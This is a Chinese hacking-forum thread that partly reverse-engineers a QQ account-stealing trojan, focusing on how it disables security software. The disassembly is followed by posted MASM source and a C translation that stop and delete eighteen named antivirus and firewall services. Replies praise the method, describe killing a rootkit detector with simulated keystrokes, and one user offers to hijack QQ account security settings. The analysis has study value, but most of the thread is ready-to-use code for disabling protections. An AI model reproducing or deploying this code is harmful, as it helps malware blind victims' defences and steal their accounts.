[原创]不完全逆向分析啊拉QQ大盗
文章作者:asm[C.R.S.T]信息来源:邪恶八进制信息安全团队
啊拉QQ大盗有几个部分,大家看一下他的功能:
[attach]5539[/attach]
运行后关闭QQ,安装后删除自身,过滤重复号码,彻底坠毁防火墙等等.其中我最感兴趣的还是看看啊拉QQ大盗是怎么坠毁防火墙的,故挑了重点对它进行逆向分析.这个服务端是加了个壳.我对脱壳白痴,所以叫冷血书生帮我脱了.废话少说,下面是反汇编代码:
[code]
.shrink:0040A0AA mov eax, offset s_Rsccenter ; "RsCCenter"
.shrink:0040A0AF call sub_4095FC ;干掉如下防火墙服务..
.shrink:0040A0AF
.shrink:0040A0B4 mov eax, offset s_Kvsrvxp ; "KVSrvXP"
.shrink:0040A0B9 call sub_4095FC
.shrink:0040A0B9
.shrink:0040A0BE mov eax, offset s_Kavsvc ; "kavsvc"
.shrink:0040A0C3 call sub_4095FC
.shrink:0040A0C3
.shrink:0040A0C8 mov eax, offset s_Kpfwsvc ; "KPfwSvc"
.shrink:0040A0CD call sub_4095FC
.shrink:0040A0CD
.shrink:0040A0D2 mov eax, offset s_Kwatchsvc ; "KWatchSvc"
.shrink:0040A0D7 call sub_4095FC
.shrink:0040A0D7
.shrink:0040A0DC mov eax, offset s_Wscsvc ; "wscsvc"
.shrink:0040A0E1 call sub_4095FC
.shrink:0040A0E1
.shrink:0040A0E6 mov eax, offset s_Sndsrvc ; "SNDSrvc"
.shrink:0040A0EB call sub_4095FC
.shrink:0040A0EB
.shrink:0040A0F0 mov eax, offset s_Ccproxy ; "ccProxy"
.shrink:0040A0F5 call sub_4095FC
.shrink:0040A0F5
.shrink:0040A0FA mov eax, offset s_Ccevtmgr ; "ccEvtMgr"
.shrink:0040A0FF call sub_4095FC
.shrink:0040A0FF
.shrink:0040A104 mov eax, offset s_Ccsetmgr ; "ccSetMgr"
.shrink:0040A109 call sub_4095FC
.shrink:0040A109
.shrink:0040A10E mov eax, offset s_Spbbcsvc ; "SPBBCSvc"
.shrink:0040A113 call sub_4095FC
.shrink:0040A113
.shrink:0040A118 mov eax, offset s_SymantecCoreL ; "Symantec Core LC"
.shrink:0040A11D call sub_4095FC
.shrink:0040A11D
.shrink:0040A122 mov eax, offset s_Navapsvc ; "navapsvc"
.shrink:0040A127 call sub_4095FC
.shrink:0040A127
.shrink:0040A12C mov eax, offset s_Npfmntor ; "NPFMntor"
.shrink:0040A131 call sub_4095FC
.shrink:0040A131
.shrink:0040A136 mov eax, offset s_Mskservice ; "MskService"
.shrink:0040A13B call sub_4095FC
.shrink:0040A13B
.shrink:0040A140 mov eax, offset s_Mctaskmanager ; "McTaskManager"
.shrink:0040A145 call sub_4095FC
.shrink:0040A145
.shrink:0040A14A mov eax, offset s_Mcshield ; "McShield"
.shrink:0040A14F call sub_4095FC
.shrink:0040A14F
.shrink:0040A154 mov eax, offset s_Mcafeeframewo ; "McAfeeFramework"
.shrink:0040A159 call sub_4095FC
.shrink:0040A159
.shrink:0040A15E
.shrink:0040A15E loc_40A15E: ; CODE XREF: .shrink:0040A16D j
.shrink:0040A15E call sub_409064
.shrink:0040A15E
.shrink:0040A163 push 0BB8h
.shrink:0040A168 call Sleep ;休眠
.shrink:0040A168
.shrink:0040A16D jmp short loc_40A15E
.shrink:0040A16D
[/code]
很明显,通过一个参数传递给sub_4095FC这个分支,而这个参数正好是一些常见的杀毒软件服务名称.所以这个函数应该这样构造:char sub_4095FC(int buffer)(C语言语法)把这个名称传递给sub_4095FC干什么捏?大家请看sub_4095FC这个分支:
[code]
.shrink:004095FC sub_4095FC proc near
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC var_4 = dword ptr -4 ;传递进来的参数
.shrink:004095FC
.shrink:004095FC push ebp
.shrink:004095FD mov ebp, esp
.shrink:004095FF push ecx
.shrink:00409600 push ebx
.shrink:00409601 push esi
.shrink:00409602 push edi
.shrink:00409603 mov [ebp+var_4], eax
.shrink:00409606 mov eax, [ebp+var_4]
.shrink:00409609 call sub_403ED0
.shrink:00409609
.shrink:0040960E xor eax, eax
.shrink:00409610 push ebp
.shrink:00409611 push offset s_SUIL_YN@ ; "榕瀄xFF\xFF腽嬅_^[Y]脥@" (这里已经被加密)
.shrink:00409616 push dword ptr fs:[eax]
.shrink:00409619 mov fs:[eax], esp
.shrink:0040961C mov eax, [ebp+var_4]
.shrink:0040961F call sub_403EE0
.shrink:0040961F
.shrink:00409624 mov esi, eax
.shrink:00409626 push 0F003Fh ; dwDesiredAccess
.shrink:0040962B push 0 ; lpDatabaseName
.shrink:0040962D push 0 ; lpMachineName
.shrink:0040962F call OpenSCManagerA ; 打开服务管理器
.shrink:0040962F
.shrink:00409634 mov edi, eax ; 保存句柄到edi
.shrink:00409636 test edi, edi ; 是否打开成功?
.shrink:00409638 jbe short loc_4096A8 ; 打开成功,继续执行,反之跳到这里
.shrink:00409638
.shrink:0040963A push 0F01FFh ; dwDesiredAccess
.shrink:0040963F push esi ; lpServiceName
.shrink:00409640 push edi ; hSCManager
.shrink:00409641 call OpenServiceA ; 打开一个防火墙的服务
.shrink:00409641
.shrink:00409646 mov esi, eax
.shrink:00409648 test esi, esi
.shrink:0040964A jbe short loc_4096A2 ; 打开出错 关闭句柄
.shrink:0040964A
.shrink:0040964C push offset ServiceStatus ; lpServiceStatus
.shrink:00409651 push 1 ; dwControl
.shrink:00409653 push esi ; hService
.shrink:00409654 call ControlService ; 停止人家的防火墙的服务
.shrink:00409654
.shrink:00409659 test eax, eax
.shrink:0040965B jz short loc_4096A8
.shrink:0040965B
.shrink:0040965D push 3E8h ; dwMilliseconds
.shrink:00409662 call Sleep ; 休眠1000秒
.shrink:00409662
.shrink:00409667 jmp short loc_40967C
.shrink:00409667
.shrink:00409669 ; ---------------------------------------------------------------------------
.shrink:00409669
.shrink:00409669 loc_409669:
.shrink:00409669 cmp ServiceStatus.dwCurrentState,3 ;是否是SERVICE_STOP_PENDING状态
.shrink:00409670 jnz short loc_40968B
.shrink:00409670
.shrink:00409672 push 3E8h ; dwMilliseconds
.shrink:00409677 call Sleep ;休眠
.shrink:00409677
.shrink:0040967C
.shrink:0040967C loc_40967C:
.shrink:0040967C push offset ServiceStatus ; lpServiceStatus
.shrink:00409681 push esi ; hService
.shrink:00409682 call QueryServiceStatus ; 查询设备驱动器的当前状态
.shrink:00409682
.shrink:00409687 test eax, eax
.shrink:00409689 jnz short loc_409669 ; 查询未成功,继续休泯,然后再查询
.shrink:00409689
.shrink:0040968B
.shrink:0040968B loc_40968B:
.shrink:0040968B cmp ServiceStatus.dwCurrentState, 1
.shrink:00409692 jz short loc_4096A8 ; 对比是否收到控制代码SERVICE_STOP_PENDING
.shrink:00409692
.shrink:00409694 push esi ; hSCObject
.shrink:00409695 call CloseServiceHandle ; 关闭这个服务
.shrink:00409695
.shrink:0040969A push edi ; hSCObject
.shrink:0040969B call CloseServiceHandle
.shrink:0040969B
.shrink:004096A0 jmp short loc_4096A8
.shrink:004096A0
.shrink:004096A2 ; ---------------------------------------------------------------------------
.shrink:004096A2
.shrink:004096A2 loc_4096A2:
.shrink:004096A2 push edi ; hSCObject
.shrink:004096A3 call CloseServiceHandle ; 关闭打开服务管理器的句柄
.shrink:004096A3
.shrink:004096A8
.shrink:004096A8 loc_4096A8:
.shrink:004096A8
.shrink:004096A8
.shrink:004096A8
.shrink:004096A8 xor eax, eax
.shrink:004096AA pop edx
.shrink:004096AB pop ecx
.shrink:004096AC pop ecx
.shrink:004096AD mov fs:[eax], edx
.shrink:004096B0 push 4096C5h ; <suspicious>
.shrink:004096B5 lea eax, [ebp+var_4]
.shrink:004096B8 call sub_403B68
.shrink:004096B8
.shrink:004096BD retn
.shrink:004096BD
.shrink:004096BD sub_4095FC endp ; sp = -18h
[/code]
原来是通过连接服务器设备管理器来关闭服务,如果函数ControlService执行不成功的话,就关闭句柄退了出去,反之,查询一下ControlService函数关闭后管理器返回的ServiceStatus的结构成员dwCurrentState的值非SERVICE_STOP_PENDING的标志,就代表关闭成功,就可以关闭这个服务了.其实这是很简单的.
下面就给出汇编源代码
[code]
;******************************************************************
;程序编写by Asm
;日期:2007-3-07日
;出处:[url]http://www.wolfexp.net/[/url](红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组([url]http://www.wolfexp.net/[/url])
;注意事项:公布源码仅限技术交流,如果使用引起的损失,由使用者自己全部负责!
;*****************************************************************
.386
.model flat, stdcall
option casemap :none
include windows.inc
include kernel32.inc
include advapi32.inc
includelib kernel32.lib
includelib advapi32.lib
_CloseService PROTO :DWORD
.data
s_Rsccenter db "RsCCenter"
s_Kvsrvxp db "KVSrvXP"
s_Kavsvc db "kavsvc"
s_Kpfwsvc db "KPfwSvc"
s_Kwatchsvc db "KWatchSvc"
s_Wscsvc db "wscsvc"
s_Sndsrvc db "SNDSrvc"
s_Ccproxy db "ccProxy"
s_Ccevtmgr db "ccEvtMgr"
s_Ccsetmgr db "ccSetMgr"
s_Spbbcsvc db "SPBBCSvc"
s_SymantecCoreL db "Symantec Core LC"
s_Navapsvc db "navapsvc"
s_Npfmntor db "NPFMntor"
s_Mskservice db "MskService"
s_Mctaskmanager db "McTaskManager"
s_Mcshield db "McShield"
s_Mcafeeframewo db "McAfeeFramework"
.code
_CloseService proc _Service
local hSCManager:DWORD
local hService:DWORD
local ServiceStatus:SERVICE_STATUS
invoke OpenSCManager,NULL,NULL, SC_MANAGER_CREATE_SERVICE ;连接服务管理器
.if eax!=0
mov hSCManager, eax ;连接成功,返回一个句柄
.elseif
jmp ExitSCManager
.endif
invoke OpenService, hSCManager,_Service,0F01FFh ;打开服务
.if eax!=0
mov hService,eax
.elseif
jmp ExitSCManager
.endif
invoke ControlService,hService,SERVICE_CONTROL_STOP,addr ServiceStatus ;停止防火墙的服务
.if eax == NULL
jmp ExitSCManager
.endif
invoke Sleep,1000
invoke QueryServiceStatus,hService,addr ServiceStatus ;查询返回的标志
.if eax != NULL
cmp ServiceStatus.dwCurrentState,SERVICE_STOP_PENDING ;获取SERVICE_STOP_PENDING标志代表关闭成功
jnz ColseIt
.endif
ColseIt:
cmp ServiceStatus.dwCurrentState,1h
jz ExitSCManager
invoke CloseServiceHandle,hService
invoke CloseServiceHandle,hSCManager
ExitSCManager:
invoke CloseServiceHandle, hSCManager
invoke ExitProcess,NULL
_CloseService endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke _CloseService,addr s_Rsccenter
invoke _CloseService,addr s_Kvsrvxp
invoke _CloseService,addr s_Kavsvc
invoke _CloseService,addr s_Kpfwsvc
invoke _CloseService,addr s_Kwatchsvc
invoke _CloseService,addr s_Wscsvc
invoke _CloseService,addr s_Sndsrvc
invoke _CloseService,addr s_Ccproxy
invoke _CloseService,addr s_Ccevtmgr
invoke _CloseService,addr s_Ccsetmgr
invoke _CloseService,addr s_Spbbcsvc
invoke _CloseService,addr s_SymantecCoreL
invoke _CloseService,addr s_Navapsvc
invoke _CloseService,addr s_Npfmntor
invoke _CloseService,addr s_Mskservice
invoke _CloseService,addr s_Mctaskmanager
invoke _CloseService,addr s_Mcshield
invoke _CloseService,addr s_Mcafeeframewo
end start
[/code] [quote][b]引用第2楼[i]lin5066870[/i]于[i]2007-03-07 15:03[/i]发表的[/b]:
本人会改QQ密保~~~~在不知道密码的情境下~~~~~~改之~~~~~~~学习的请联系QQ;5066870[/quote]
QQ:448761813 把我的密保改了,我叫你爷爷
PS:小爷我最讨厌这种顶贴方式... [s:68] 这学期准备学习汇编
不知道分析有无后门这个汇编代码怎么分析 呵呵,比较垃圾的一个QQ盗号软件,无法穿透NP的保护... [s:265][quote]引用第6楼bigwahaha于2007-03-08 17:05发表的 :
呵呵,比较垃圾的一个QQ盗号软件,无法穿透NP的保护...[/quote]
啊拉QQ拉不垃圾可不关我的事....
估计作者很久没有更新了,而杀毒软件正在飞跃发展...
我反汇编这个啊拉,只是为了修炼逆向功底,至于程序的优劣,不在我的学习范围之内
[s:265] 应该先查询在关,这样一棍子打死一大群的方法太费时间了,而且他还延时一秒,等关完了什么什么墙人家早就登陆完QQ了,登完QQ在调杀毒软件就没机会偷了。 摧毁防火墙的方法值得 借鉴 [quote]引用第7楼zmhack于2007-03-24 00:30发表的 :
摧毁防火墙的方法值得 借鉴[/quote]
呵呵,是值得借鉴
都说冰刃是驱动了,但是熊猫还是利用PostMessageA发送12h,调用MapVirtualKeyA对消息进行扫描,keybd_event模拟用户点击来kill掉了冰刃.....
比如卡巴,它再牛总得让用户关闭吧?呵呵,PostMessageA派上用场了 [s:265] 不好意思,翻译了一下,高手勿笑[s:269]
# include <windows.h>
# include <stdio.h>
void remove(char *s)
{ SC_HANDLE service , scm;
BOOL success;
SERVICE_STATUS status ;
//starting connect
if((scm=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS))==NULL)
{
printf("OpenSCManager Error\n");
}
service=OpenService(scm,s,SERVICE_ALL_ACCESS|DELETE);
if(!service)
{
printf("OpenService error!\n");
}
success=QueryServiceStatus(service,&status);
if (!success)
{
printf("QueryServiceStatus error!\n");
}
if ( status.dwCurrentState!=SERVICE_STOPPED )
{
success=ControlService(service,SERVICE_CONTROL_STOP,&status);
if (!success )
{
printf("failed!!\n");
}
Sleep(1000);
}
if( success=DeleteService(service))
printf("firewall removed\n");
else printf("delete failed!!");
CloseServiceHandle(service);
CloseServiceHandle(scm);
printf("thank you for using...\n");
}
void version()
{
printf("**************** close fire wall **********\n");
printf("**************** trandlated from asm by uncledo \n");
printf("**************** [email]uncledo@163.com[/email] **********\n");
}
void main()
{ int i;
char name[18][30]={
"RsCCenter",
"KVSrvXP",
"kavsvc",
"KPfwSvc",
"KWatchSvc",
"wscsvc",
"SNDSrvc",
"ccProxy",
"ccEvtMgr",
"ccSetMgr",
"SPBBCSvc",
"Symantec Core LC",
"navapsvc",
"NPFMntor",
"MskService",
"McTaskManager",
"McShield",
"McAfeeFramework",
};
version();
for(i=0;i<18;i++)
remove(&name[i][30]);
} [s:267] 那东西的源代码不是有吗
[s:270] 不知道用OD的话,容不容易得出楼主的效果呢? [quote]引用第10楼冷血书生于2007-12-01 20:58发表的 :
不知道用OD的话,容不容易得出楼主的效果呢?[/quote]
逆向还是IDA,和看汇编差不多 值得借鉴,谢啦! 经典东西,本来以为看不懂 呵呵 居然看懂了以部分呢!
页:
[1]